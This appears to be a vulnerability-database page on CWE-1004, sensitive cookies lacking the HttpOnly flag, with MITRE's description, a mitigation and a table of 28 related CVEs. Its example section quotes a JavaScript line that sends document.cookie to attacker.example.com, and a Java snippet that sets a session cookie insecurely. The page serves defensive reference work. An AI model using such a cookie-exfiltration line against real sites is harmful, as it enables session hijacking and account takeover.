Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CWE-1004 (没有’HttpOnly’标志的敏感Cookie) — Vulnerability Class 28

28 vulnerabilities classified as CWE-1004 (没有’HttpOnly’标志的敏感Cookie). AI Chinese analysis included.

CWE-1004 represents a configuration weakness where sensitive data, such as session identifiers, is stored in cookies lacking the HttpOnly attribute. This omission allows client-side scripts, including malicious JavaScript injected via Cross-Site Scripting (XSS) vulnerabilities, to access and exfiltrate the cookie contents. Attackers typically exploit this by executing arbitrary scripts in the victim’s browser to steal session tokens, thereby hijacking user accounts or performing unauthorized actions. To mitigate this risk, developers must explicitly set the HttpOnly flag on all cookies containing sensitive information. This flag instructs the browser to prevent client-side scripts from accessing the cookie, effectively neutralizing XSS-based theft attempts. By enforcing this configuration, organizations ensure that even if an XSS vulnerability exists, the attacker cannot retrieve the critical authentication data stored within the cookie.

MITRE CWE Description
The product uses a cookie to store sensitive information, but the cookie is not marked with the HttpOnly flag.
Common Consequences (2)
ConfidentialityRead Application Data
If the HttpOnly flag is not set, then sensitive information stored in the cookie may be exposed to unintended parties.
IntegrityGain Privileges or Assume Identity
If the cookie in question is an authentication cookie, then not setting the HttpOnly flag may allow an adversary to steal authentication data (e.g., a session ID) and assume the identity of the user.
Mitigations (1)
ImplementationLeverage the HttpOnly flag when setting a sensitive cookie in a response.
Effectiveness: High
Examples (1)
In this example, a cookie is used to store a session ID for a client's interaction with a website. The intention is that the cookie will be sent to the website with each request made by the client.
String sessionID = generateSessionId(); Cookie c = new Cookie("session_id", sessionID); response.addCookie(c);
Bad · Java
document.write('<img src="http://attacker.example.com/collect-cookies?cookie=' + document.cookie . '">'
Attack · JavaScript
CVE IDTitleCVSSSeverityPublished
CVE-2026-42239 Budibase auth session cookies are set with httpOnly:false — any XSS can lead to full account takeover — budibase 8.1 High2026-05-07
CVE-2026-0696 Session Cookies Missing HttpOnly Attribute — PSA 6.5 Medium2026-01-16
CVE-2026-22081 Cookie without HTTPOnly Flag Vulnerability in Tenda Wireless Routers — 300Mbps Wireless Router F3 and N300 Easy Setup Router 7.5 -2026-01-09
CVE-2025-12031 HTTP Security Misconfiguration - Lacking Secure and HTTPOnly Attribute — BLU-IC2 5.3AIMediumAI2025-10-21
CVE-2025-42909 Security Misconfiguration vulnerability in SAP Cloud Appliance Library Appliances — SAP Cloud Appliance Library Appliances 3.0 Low2025-10-14
CVE-2025-27453 CVE-2025-27453 — Endress+Hauser MEAC300-FNADE4 5.3 Medium2025-07-03
CVE-2025-49189 Cookie missing HttpOnly flag — SICK Media Server 5.3 Medium2025-06-12
CVE-2025-47289 Stored XSS in CE Phoenix Cart Testimonials Allows Account Takeover if Missing HttpOnly Flag — PhoenixCart 6.3 Medium2025-06-02
CVE-2025-24318 Dario Health USB-C Blood Glucose Monitoring System Starter Kit Android Application Sensitive Cookie Without 'HttpOnly' Flag — Dario Application Database and Internet-based Server Infrastructure 6.8 Medium2025-02-28
CVE-2025-0479 Security Misconfiguration Vulnerability in CP Plus Router — CP-XR-DE21-S Router 9.1 -2025-01-20
CVE-2022-43845 IBM Aspera Console information disclosure — Aspera Console 3.7 Low2024-09-24
CVE-2022-33167 IBM Security Directory Integrator information disclosure — Security Directory Integrator 3.7 Low2024-07-30
CVE-2024-41685 Cookie Without HTTPOnly Flag Set Vulnerability — SyroTech SY-GPON-1110-WDONT router 5.3 -2024-07-26
CVE-2024-6739 Openfind MailGates and MailAudit - Sensitive Cookie Without 'HttpOnly' Flag — MailGates 5.3 Medium2024-07-15
CVE-2023-4217 Session cookies attribute not set properly — PT-G503 Series 3.1 Low2023-11-02
CVE-2023-4228 ioLogik 4000 Series: Session Cookies Attribute Not Set Properly — ioLogik 4000 Series 3.1 Low2023-08-24
CVE-2023-2876 Session cookie exposure for client side script — REX640 PCL1 3.1 Low2023-06-13
CVE-2022-21939 Sensitive cookie without 'HttpOnly' flag in System Configuration Tool (SCT) — System Configuration Tool (SCT) 7.5 High2023-02-09
CVE-2019-25091 nsupdate.info CSRF Cookie base.py cookie httponly flag — nsupdate.info 3.7 Low2022-12-27
CVE-2022-4630 Sensitive Cookie Without 'HttpOnly' Flag in lirantal/daloradius — lirantal/daloradius 5.3 -2022-12-21
CVE-2022-25172 InHand Networks InRouter302 跨站脚本漏洞 — InRouter302 6.1 -2022-05-12
CVE-2021-42115 Missing HTTPOnly flag on sensitive cookie in TopEase — TopEase 8.1 High2021-11-30
CVE-2021-39210 Autologin cookie accessible by scripts — glpi 6.5 Medium2021-09-15
CVE-2021-3706 Sensitive Cookie Without 'HttpOnly' Flag in pi-hole/adminlte — pi-hole/adminlte 7.5 -2021-09-15
CVE-2021-34563 In WirelessHART-Gateway versions 3.0.8 and 3.0.9 the HttpOnly flag is missing in a cookie which allows client-side javascript to modify it — WHA-GW-F2D2-0-AS- Z2-ETH 3.3 Low2021-08-31
CVE-2020-27658 Synology Router Manager 安全漏洞 — Synology Router Manager (SRM) 7.1 High2020-10-29
CVE-2020-6267 SAP Disclosure Management 跨站脚本漏洞 — SAP Disclosure Management 6.5 -2020-07-14
CVE-2019-8283 Gemalto Admin Control Center 信息泄露漏洞 — Sentinel LDK RTE 6.5 -2019-06-07

Vulnerabilities classified as CWE-1004 (没有’HttpOnly’标志的敏感Cookie) represent 28 CVEs. The CWE taxonomy describes the weakness; review individual CVEs for product-specific impact.